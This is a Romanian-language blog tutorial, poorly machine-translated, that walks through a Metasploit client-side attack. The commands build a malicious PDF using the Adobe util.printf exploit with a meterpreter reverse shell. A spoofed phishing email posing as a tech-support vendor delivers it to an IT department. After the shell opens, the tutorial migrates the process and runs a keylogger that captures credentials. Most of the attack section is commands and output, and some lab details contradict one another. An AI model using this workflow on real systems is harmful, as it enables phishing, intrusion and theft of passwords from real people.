Client Side Attack

neo.hapsis · November 9, 2012

Pentru a demonstra puterea si modul MSF cum pot fi folosite in "client side" atac voi folosi o poveste.În lumea de securitate, de inginerie social? a devenit un vector de atac ce în ce mai utilizate.

Chiar dac? tehnologiile se schimb?, un lucru care pare s? r?mân? acela?i lucru este lipsa de "securitate cu oamenii".

Datorit? faptului c?,inginerie social? a devenit un foarte "fierbinte" subiect în lumea securitati.

În scenariul nostru primul lucru care a fost de a culege o multime de informa?ii folosind instrumente, cum ar fi in cadru Metasploit, Maltego ?i alte instrumente pentru a aduna adrese de e-mail si informatii pentru a lansa un atac client side pe victima.

Dup? o scufundare in tomberonul informatiilor ?i cautari dupa email-uri de pe web, am gasit dou? informa?ii importante despre tinta.

1) Ei folosesc "Best Computers" pentru servicii tehnice.

2) Departamentul IT are o adres? de e-mail a itdept@victim.com

Dorim s? uplodam shell pe calculatorul departamentului IT ?i executa un key-logger pentru a ob?ine parole, Intel sau orice alte informatii.

Vom începe prin înc?rcarea msfconsole nostru. Dupa ce le-am sunt înc?rcate, cream un fisier PDF malitios care ne ofera o portita in securitate tintei.

Pentru a face acest lucru, trebuie s? apar? legitim, au un titlu care este realist, si sa nu fie semnalizat de anti-virus sau alt software de alert? de securitate.

Vom utiliza Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability.

Adobe Reader este predispus la un stack-based buffer overflow vulnerabilitate, deoarece-cererea nu reu?e?te s? efectueze controale adecvate de frontier? de pe ghidul de-a furnizat datele. Un atacator poate exploata aceast? problem? pentru a executa cod arbitrar cu privilegiile utilizatorului care ruleaz? aplica?ia sau accident cererii, negând serviciu pentru utilizatorii legitim.

Deci, vom începe prin crearea nostru de fisier malware PDF pentru a fi utilizate în acest atac "client -side".

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
FILENAME => BestComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(adobe_utilprintf) > set LPORT 4455
LPORT => 4455
msf exploit(adobe_utilprintf) > show options

Module options:

   Name        Current Setting                             Required  Description
   ----        ---------------                             --------  -----------
   FILENAME    BestComputers-UpgradeInstructions.pdf       yes       The file name.
   OUTPUTPATH  /pentest/exploits/framework3/data/exploits  yes       The location of the file.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description            
   ----      ---------------  --------  -----------            
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.8.128    yes       The local address      
   LPORT     4455             yes       The local port         


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.1.2 (Windows XP SP3 English)

Dup? ce vom seta toate op?iunile stabilite modul în care dorim, vom rula "exploit" pentru a crea fisierul malitios.

msf exploit(adobe_utilprintf) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'BestComputers-UpgradeInstructions.pdf' file...
[*] Generated output file /pentest/exploits/framework3/data/exploits/BestComputers-UpgradeInstructions.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_utilprintf) >

Deci, putem vedea c? fisierul nostru în format PDF a fost creat într-un sub-director de unde suntem.

Deci, haide?i s? copiam in directorul nostru / tmp deci este mai u?or de a localiza mai târziu în exploit nostru.

Înainte de a ne trimite fisier malware pentru victima noastr? avem nevoie pentru a configura un ascult?tor pentru

a captura aceast? conexiune invers?. Vom folosi msfconsole s? înfiin?eze ascult?torul nostru pentru manipulare.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4455
LPORT => 4455
msf exploit(handler) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

Acum, c? ascult?torul nostru este în a?teptare pentru a primi sarcina sa util?, r?u inten?ionat trebuie

numai s? le livram la victima ?i deoarece în culegerea de informa?ii noastr? am ob?inut adresa de e-mail a

departamentului de IT, vom folosi un script la îndemân? mic numit sendEmail pentru a oferi aceast? sarcin? util? pentru a victim?. Cu un kung-fu-o linie, se poate ata?a PDF malitios, utilizam orice server SMTP dorim ?i s? scriem un e-mail

destul de conving?toare de la orice adres? vrem ....

root@bt:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.

IT Dept,

We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.

Sincerely,

Best Computers Tech Support
Aug 24 17:32:51 bt sendEmail[13144]: Message input complete.
Aug 24 17:32:51 bt sendEmail[13144]: Email was sent successfully!

Dup? cum putem vedea aici, script-ul ne permite s? afi?ezi orice DIN (-f), adresa de orice TO (-t), orice SMTP (-e) serverul,

precum ?i titlurile (-u) ?i ata?amentul nostru malware (-a ). Odat? ce vom face tot ceea ce vrem, apasam enter putem scrie orice mesaj ne-o dorim, apoi ap?sam CTRL + D ?i acest lucru va trimite e-mail pentru a victimei.

Acum pe masina victimei, IT angajat al Departamentul de Securitate este obtinerea softwarelor la zi el verifica e-mail lui.

El vede ca este un document foarte important isi copiaz? pe desktop-ul lui (ca el face întotdeauna) astfel încât el poate scana acest lucru cu program anti-virus.

File:CSA-001.jpg

Dup? cum putem vedea, acesta a trecut cu brio si VICTIMA noastra este dispus s? deschid? acest fi?ier pentru a pune în aplicare rapida acest upgrade-uri foarte importante. F?când clic pe fi?ierul se deschide Adobe, dar prezinta o fereastr? în gri, care nu dezv?luie un PDF. În schimb, conexiunea inversa se executa pe masina victimei.

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
session[*] Meterpreter session 1 opened (192.168.8.128:4455 -> 192.168.8.130:49322)

meterpreter >

Avem acum o coaj? de pe computerul lor printr-un atac r?u inten?ionat PDF client side attack.

Desigur, ceea ce ar fi în?elept în acest moment este de a muta coaj? (shell) într-un proces diferit, asa ca atunci cand ei se ucid Adobe nu ne pierdem shellul nostru. Apoi vom ob?ine informa?ii de sistem, începem un key-logger ?i de a continua exploatarea re?elei.

meterpreter > ps

Process list
============

    PID   Name            Path                                 
    ---   ----            ----                                 
    852   taskeng.exe     C:\Windows\system32\taskeng.exe      
    1308  Dwm.exe         C:\Windows\system32\Dwm.exe          
    1520  explorer.exe    C:\Windows\explorer.exe              
    2184  VMwareTray.exe  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    2196  VMwareUser.exe  C:\Program FilesVMware\VMware Tools\VMwareUser.exe
    3176  iexplore.exe    C:\Program Files\Internet Explorer\iexplore.exe
    3452  AcroRd32.exe    C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)

meterpreter > sysinfo
Computer: OFFSEC-PC
OS      : Windows Vista (Build 6000, ).

meterpreter > use priv
Loading extension priv...success.

meterpreter > run post/windows/capture/keylog_recorder 

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
[*] Recording keystrokes...

root@bt:~# cat /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
Keystroke log started at Wed Mar 23 09:18:36 -0600 2011
Support,   I tried to open ti his file 2-3 times with no success.  I even had my admin and CFO tru   y it, but no one can get it to p open.  I turned on the rmote access server so you can log in to fix our p         this problem.  Our user name is admin and password for that session is 123456.   Call or eme ail when you are done.   Thanks IT Dept